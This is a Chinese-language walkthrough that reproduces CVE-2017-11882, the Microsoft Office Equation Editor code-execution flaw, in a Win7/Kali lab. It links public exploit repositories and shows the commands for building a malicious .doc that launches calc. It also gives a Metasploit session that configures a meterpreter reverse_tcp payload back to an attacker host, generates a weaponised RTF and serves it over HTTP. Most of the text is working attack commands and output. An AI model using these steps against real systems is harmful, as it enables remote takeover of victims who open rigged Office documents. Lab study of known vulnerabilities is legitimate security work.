CVE-2017-11882漏洞影響版本
office 2003
office 2007
office 2010
office 2013
office 2016
復現環境
win7
kali
office 2016
office2016分享鏈接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A
提取碼:d1lo
下載組件
下載
https://github.com/Ridter/CVE-2017-11882/
https://github.com/0x09AL/CVE-2017-11882-metasploit
將CVE-2017-11882.rb拷貝到目錄/usr/share/metasploit-framework/modules/exploits/windows/smb下
測試
製作一個彈出計算器的文檔
python Command109b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o 1.doc
將文檔放到靶機打開
成功
使用msf復現
msf5 > search cve-2017-11882
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
1 exploit/windows/smb/cve_2017_11882 2017-11-21 excellent No Microsoft Office Word Equation Editor RCE
msf5 > use exploit/windows/smb/cve_2017_11882
msf5 exploit(windows/smb/cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/cve_2017_11882) > set LHOST 192.168.31.117
LHOST => 192.168.31.117
msf5 exploit(windows/smb/cve_2017_11882) > set URIPATH test
URIPATH => test
msf5 exploit(windows/smb/cve_2017_11882) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.31.117:4444
[*] Generating command with length 44
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Using URL: http://0.0.0.0:8080/test
生成文檔
將文檔複製到靶機打開
msf5 exploit(windows/smb/cve_2017_11882) > sessions -i 1